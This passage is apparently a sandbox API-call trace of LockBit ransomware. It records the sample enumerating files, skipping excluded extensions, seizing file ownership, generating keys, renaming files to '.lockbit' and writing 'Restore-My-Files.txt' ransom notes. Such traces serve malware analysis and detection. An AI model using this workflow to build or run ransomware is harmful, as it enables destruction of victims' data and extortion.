nFileSizeLow=0x1e96c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0079.209] lstrcmpiW (lpString1=".", lpString2="BabyBoyScenesBackground_PAL.wmv") returned -1 [0079.209] lstrcmpiW (lpString1="..", lpString2="BabyBoyScenesBackground_PAL.wmv") returned -1 [0079.209] PathFindExtensionW (pszPath="BabyBoyScenesBackground_PAL.wmv") returned=".wmv" [0079.209] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.209] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.210] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.211] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.211] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyScenesBackground_PAL.wmv") returned 1 [0079.212] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyScenesBackground_PAL.wmv") returned 1 [0079.212] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyScenesBackground_PAL.wmv") returned 1 [0079.212] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyScenesBackground_PAL.wmv") returned 1 [0079.212] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyScenesBackground_PAL.wmv") returned -1 [0079.212] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyScenesBackground_PAL.wmv") returned 1 [0079.212] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyScenesBackground_PAL.wmv") returned 1 [0079.212] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.212] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv") returned=".wmv" [0079.212] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.212] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.212] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.213] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.214] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.214] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.214] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.214] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.214] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.214] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.214] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv.lockbit") returned 92 [0079.214] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.215] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.215] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.215] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.215] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.216] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.216] RtlFreeAnsiString (AnsiString="\\") [0079.216] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0079.216] malloc (_Size=0x200) returned 0x77d800 [0079.216] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.216] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.216] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.216] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.217] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.217] CloseHandle (hObject=0x3bc) returned 1 [0079.217] free (_Block=0x77d800) [0079.217] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.217] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.218] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.218] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=125292) returned 1 [0079.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.219] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.227] malloc (_Size=0xce) returned 0x77d800 [0079.227] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0079.228] free (_Block=0x77d800) [0079.228] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.228] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.228] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.228] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fa69c7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fa69c7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LightBlueRectangle.PNG", cAlternateFileName="")) returned 1 [0079.228] lstrcmpiW (lpString1=".", lpString2="LightBlueRectangle.PNG") returned -1 [0079.228] lstrcmpiW (lpString1="..", lpString2="LightBlueRectangle.PNG") returned -1 [0079.228] PathFindExtensionW (pszPath="LightBlueRectangle.PNG") returned=".PNG" [0079.228] lstrcmpiW (lpString1=".386", lpString2=".PNG") returned -1 [0079.228] lstrcmpiW (lpString1=".cmd", lpString2=".PNG") returned -1 [0079.228] lstrcmpiW (lpString1=".exe", lpString2=".PNG") returned -1 [0079.228] lstrcmpiW (lpString1=".ani", lpString2=".PNG") returned -1 [0079.228] lstrcmpiW (lpString1=".adv", lpString2=".PNG") returned -1 [0079.228] lstrcmpiW (lpString1=".theme", lpString2=".PNG") returned 1 [0079.228] lstrcmpiW (lpString1=".msi", lpString2=".PNG") returned -1 [0079.228] lstrcmpiW (lpString1=".msp", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".com", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".diagpkg", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".nls", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".diagcab", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".lock", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".ocx", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".mpa", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".cpl", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".mod", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".hta", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".icns", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".prf", lpString2=".PNG") returned 1 [0079.229] lstrcmpiW (lpString1=".rtp", lpString2=".PNG") returned 1 [0079.229] lstrcmpiW (lpString1=".diagcfg", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".msstyles", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".bin", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0079.229] lstrcmpiW (lpString1=".shs", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".drv", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".wpx", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".bat", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".rom", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".msc", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".spl", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".ps1", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".msu", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".ics", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".key", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".mp3", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".reg", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".dll", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".ini", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".idx", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".sys", lpString2=".PNG") returned 1 [0079.230] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".ico", lpString2=".PNG") returned -1 [0079.230] lstrcmpiW (lpString1=".lnk", lpString2=".PNG") returned -1 [0079.231] lstrcmpiW (lpString1=".rdp", lpString2=".PNG") returned 1 [0079.231] lstrcmpiW (lpString1=".lockbit", lpString2=".PNG") returned -1 [0079.231] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="LightBlueRectangle.PNG") returned 1 [0079.231] lstrcmpiW (lpString1="ntldr", lpString2="LightBlueRectangle.PNG") returned 1 [0079.231] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="LightBlueRectangle.PNG") returned 1 [0079.231] lstrcmpiW (lpString1="bootsect.bak", lpString2="LightBlueRectangle.PNG") returned -1 [0079.231] lstrcmpiW (lpString1="autorun.inf", lpString2="LightBlueRectangle.PNG") returned -1 [0079.231] lstrcmpiW (lpString1="thumbs.db", lpString2="LightBlueRectangle.PNG") returned 1 [0079.231] lstrcmpiW (lpString1="iconcache.db", lpString2="LightBlueRectangle.PNG") returned -1 [0079.231] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.231] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG") returned=".PNG" [0079.231] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0079.231] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0079.231] lstrcmpiW (lpString1=".7z", lpString2=".PNG") returned -1 [0079.231] lstrcmpiW (lpString1=".ckp", lpString2=".PNG") returned -1 [0079.231] lstrcmpiW (lpString1=".dacpac", lpString2=".PNG") returned -1 [0079.231] lstrcmpiW (lpString1=".db", lpString2=".PNG") returned -1 [0079.231] lstrcmpiW (lpString1=".db-shm", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".db-wal", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".db3", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".dbc", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".dbs", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".dbt", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".dbv", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".frm", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".mdf", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".mrg", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".mwb", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".myd", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".ndf", lpString2=".PNG") returned -1 [0079.232] lstrcmpiW (lpString1=".qry", lpString2=".PNG") returned 1 [0079.232] lstrcmpiW (lpString1=".sdb", lpString2=".PNG") returned 1 [0079.232] lstrcmpiW (lpString1=".sdf", lpString2=".PNG") returned 1 [0079.232] lstrcmpiW (lpString1=".sql", lpString2=".PNG") returned 1 [0079.232] lstrcmpiW (lpString1=".sqlite", lpString2=".PNG") returned 1 [0079.233] lstrcmpiW (lpString1=".sqlite3", lpString2=".PNG") returned 1 [0079.233] lstrcmpiW (lpString1=".sqlitedb", lpString2=".PNG") returned 1 [0079.233] lstrcmpiW (lpString1=".tmd", lpString2=".PNG") returned 1 [0079.233] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG.lockbit") returned 83 [0079.233] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.233] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.234] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.234] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.234] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.234] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.234] RtlFreeAnsiString (AnsiString="\\") [0079.234] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0079.234] malloc (_Size=0x200) returned 0x77d800 [0079.234] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.235] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.235] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.235] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.235] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.236] CloseHandle (hObject=0x3ac) returned 1 [0079.236] free (_Block=0x77d800) [0079.236] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0079.236] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.236] malloc (_Size=0x40068) returned 0x1ff1e60 [0079.236] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=220) returned 1 [0079.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0079.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0079.238] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0079.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.239] malloc (_Size=0xbc) returned 0x77d800 [0079.239] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0079.239] free (_Block=0x77d800) [0079.240] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.240] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.240] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.240] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fccb24, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fccb24, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MainMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0079.240] lstrcmpiW (lpString1=".", lpString2="MainMenuButtonIcon.png") returned -1 [0079.240] lstrcmpiW (lpString1="..", lpString2="MainMenuButtonIcon.png") returned -1 [0079.240] PathFindExtensionW (pszPath="MainMenuButtonIcon.png") returned=".png" [0079.240] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.240] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.240] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.240] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.240] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.240] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.240] lstrcmpiW 